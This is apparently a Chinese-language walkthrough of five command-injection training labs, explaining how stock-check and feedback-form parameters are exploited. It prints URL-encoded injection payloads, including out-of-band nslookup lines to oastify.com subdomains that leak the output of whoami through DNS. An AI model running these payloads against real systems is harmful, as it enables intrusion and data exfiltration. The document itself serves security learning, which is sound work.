1.简单的命令注入

1.1 达成目标

成功执行whoami查看当前用户的名字。

1.2 攻击步骤

观察该靶场的页面，发现这是一个展示其商品信息的页面，点击view details可以展示每个商品的详情。

来到一个商品的详情页，发现画框部分是检查商品库存的功能。

对此进行抓包，发现传递了productId和storeId参数。

对productId插入其payload

# payload

%26whoami%26

%26是对&的url编码，因为在http数据包中，&符号用来分隔不同的参数，如果直接使用&那么，会被http数据包当成分割符，因此需要进行url编码，当进行数据传递之后，对此进行解码，使其&生效。

在系统命令中，&符号用来拼接其命令，让拼接的几个命令分别运行。

2.利用时间延迟的命令盲注

2.1 达成目标

利用命令盲注导致10秒的延迟。

2.2 攻击步骤

来到Submit feedback页面，这是一个给网站提交反馈的页面。因为要向起管理员提交用户反馈，因此很可能使用了sendmail命令。使用该命令向管理员邮箱发送反馈用户的名字，邮箱以及反馈信息等。也正因为是往管理员发送邮件，因此可能网站本身不会有回显。

抓取提交反馈的数据包，往email插入payload

# payload

%26ping -c10127.0.0.1%26

3.利用输出重定向的命令盲注

3.1 达成目标

该靶场存在一个可写的文件夹：/var/www/images

执行whoami命令，将其结果重定向输出到这个文件夹下面，然后检索其内容

3.2 攻击步骤

还是来到提交反馈的页面。

在提交反馈的时候进行抓包，然后在email输入其payload。

在靶场的主界面观察其数据包，发现了一个image的路径用来加载其图片，该路径传递filename参数。

4.利用带外通道技术进行命令盲注

4.1 达成目标

利用命令盲注对burpsuite的collaborator发起DNS查询。

4.2 攻击步骤

还是一样的页面，开干。

对该页面提交任意的测试数据，然后点击Submit feedback，对此进行抓包。

来到burpsuite的collaborator，激活此功能。

该功能用来充当一个dns查询的服务器，可以把一些在渗透测试中不能直接通过其响应数据探测到的漏洞，通过out-of-band技术，在这里也就是利用collaborator这个集成在burpsutie软件里面的功能，使得通过其响应看不到的漏洞，通过这种方式显形。这个功能就类似于dnslog。

还是一样的，盯死email参数，往该参数插入payload。

# payload

%26nslookup%200no5vo9uebzjpzworih5vhzzyq4hs7gw.oastify.com%26

5.利用带外通道技术获取系统用户名

5.1 达成目标

利用带外通道技术获取系统用户名。

5.2 攻击步骤

是的，没错，还是一样的页面。

随意提交一些测试数据，然后提交其反馈进行抓包。

一样的，盯死email参数，插入Payload。

# payload

%26nslookup%20`whoami`.wrr1zkdqi73ftv0kvel1zd3v2m8dw4kt.oastify.com%26

在该payload中，``符号也就是键盘的左上角（反引号），该符号应用在系统的shell中那么符号里面的字符是会被当成命令执行的

现在，在该下图的按钮中提交我们所获取的用户名。